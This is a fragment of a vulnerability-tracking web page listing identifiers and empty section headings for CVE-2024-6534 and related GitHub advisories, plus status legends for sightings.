Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-6534 (GCVE-0-2024-6534)

GHSA-3FFF-GQW3-VJ86

Impact

PoC

GHSA-Q83V-HQ3J-4PQ3

Duplicate Advisory

Original Description

FKIE_CVE-2024-6534

Tags

Sightings

Nomenclature